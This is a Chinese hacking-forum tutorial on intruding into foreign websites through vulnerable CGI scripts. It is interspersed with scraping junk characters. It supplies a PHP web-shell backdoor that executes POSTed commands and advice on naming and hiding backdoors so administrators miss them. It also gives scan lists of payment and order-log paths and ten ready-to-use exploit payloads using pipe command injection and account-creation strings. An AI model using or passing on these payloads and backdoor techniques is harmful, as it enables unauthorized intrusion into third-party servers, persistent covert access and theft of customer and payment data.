CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
' Q, k8 G  O# `6 N很开心来到贵论坛
这里让我感觉 很有技术交流的感觉
  j3 B1 \" S/ A* ]1 @% I我会长长来玩的
前言:
7 B! h  D& B7 t( n, r: J8 R3 U以下讲解针对欧美日本网站
, ^( N: E/ ?8 s+ D0 D& d當我們在做滲透分析的時候 方法有很多
( G/ i/ ~8 d1 T( f/ w1 [我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
% r# B0 p9 U' L1 s, s% {; h目录为/cgi-bin/
! _# s1 }* p. I0 ]& n
- t1 @: {- K0 O+ l  a5 R+ \只是个人在实务上一些经验
5 }% Z( l7 \6 H% X. h. ?3 E写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
讲解一下
7 L4 n. u9 U0 h$ O# q9 Z让没有基础的人很容易上手
6 w. h. L& W3 I! a
以下内容跟帖回复才能看到
==============================

  J, J+ y8 M8 b" b- ]第1部份: 何谓Shell?
! I; V' o$ T! A! gShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
. A% u1 ~" }7 v; U" [4 ~A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

0 N# E; ]; x/ G对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
: }0 S- A1 n8 I! M6 q要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
2 ^) b# x; v* C' j所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
  |! N0 j; x. X% D$ V
7 \  A) X1 C% Q8 W: \/ E5 P7 a第2部份: Unix 指令
1 ~, c+ ~# A' t! Y" \* [以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
3 Z- M8 F7 e" Q, P3 I. S  Hls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
9 t/ C# d  _) S; V+ ecat: 显示档案内容
: K5 ?$ d* ~4 D7 \cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
9 E5 E0 D( H3 o  }5 f7 Kcat /etc/passwd: 显示 /etc/passwd 这个档案的内容
. q) W: W# P+ }7 D. {& jwho: 显示谁login 至系统
" ]9 u& Z% V  O6 m. O0 }3 O! u! Eman: 显示指令用法  
man ls: 显示ls这指令的用法  
0 J$ I  h8 x1 L* j2 r1 kmkdir 建立目录
( [+ ?4 C2 }, Z; g, r3 f+ _rmdir 删除目录
mv 移动档案
, e1 v. l6 `3 x' @3 w0 {' P  nrm 删除档案

第3部份: Shell的使用
; d2 z( _3 w- H5 X& M) `, X: K% q例如:
: g2 V" Y) Z+ i) O* Q. {# g1 \http://site.com/refer.php
这是我的後门, 原代码如下:
; G: v# t' m% ^6 i; ^$ Q. L" \<Form Action="#" Method="POST">
<Input type="text" name="cmd">
<Input type="Submit">
: a9 Q2 E, }  C; _( _3 B, S</Form>
<?php
$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
% S* M2 B- {) ]3 ?: ]echo $Output;
9 I" y# G/ d0 ^! g" }: Z?>
0 m2 A5 p" e1 X4 d* k" w9 d6 Y9 @输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
: O5 S& X" T6 ?* t
0 R: E4 u, D+ i第4部份: 注意事项
- 使用匿名代理, 保障自己
7 I8 g: ]# [/ M  C( J8 L2 h- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
  p; k/ h% k+ k- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
' t0 d" O4 d* O! }+ N! Z- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
( U9 r. n1 Y& X) S6 v+ |* Q* f" p- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
4 i7 F6 A- U2 n- f$ l7 O) |- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
) H* C: e8 I4 X% b9 b- C- i, B9 o9 h针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
+ b* f& M' v6 q* y- y8 q* l: h8 N开始讲解脚本入侵过程:
, y( ]: J: `9 h5 Y5 r, n在这里提供一些方法思路让大家学习一下

1.一开始对一个网站进行cgi漏洞扫描
* _( v$ l  B7 R我们需要的东西有
2 T5 a. ?  P  t) T$ n扫洞工具 如:triton..等等
E表
3 e: M+ U, y6 \2 v如
/cgi-bin/add-passwd.cgi
  N, h- z4 _/ m6 V# f) r/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
9 Q# ?3 j  C- M8 g% V/cgi-sys/cart.pl
/scripts/cart.pl
) ~+ M/ ]8 Z4 k" y7 M+ Y* z' q/htbin/cart.pl
& d! d& Q7 D! l/ l; {+ |$ K* C4 HE表来源可以是网路收寻或是自己的0 day
" _* V) Z- ^8 ~8 h2 ^2 J% z
2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
) y  f* S7 B) x7 w/ z. t) U# bERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
1 U0 A8 l# Q4 G5 i6 b& ~* B3.重来来了 很多人都会问我
1 F" o9 K/ T* D2 j3 `他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
4 R0 ?4 N/ T6 q我们要找post 的方法很多
可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等

以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
" e1 c% a0 ]% I) _# w  M% \& y+ i/index.cgi
wei=ren&gen=command
/passmaster.cgi
8 U  z, K$ ]! o! nAction=Add&Username=Username&Password=Password
/accountcreate.cgi
7 X  b  O/ _' U" Dusername=username&password=password&ref1=|echo;ls|
5 l/ w4 X1 I( M! a3 Y" z, I" ]/form.cgi
3 ?& d( S# o& A5 r- w0 n+ k% dname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
7 r4 y7 Z5 @+ z. l) h3 m  g/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
post_values=username:password
' w6 ^% g& ], ^& h, L: p/count.cgi
pinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
: {0 A0 D  H3 {$ n+ A, q7 Jvercode=username:password:dseegsow:add:amount<&30>
5 _' O) m* x" i" O/af.cgi_browser_out=|echo;ls -la;exit;|
9 V7 q9 Z( w7 y* z
今天就讲到这  感谢大家支持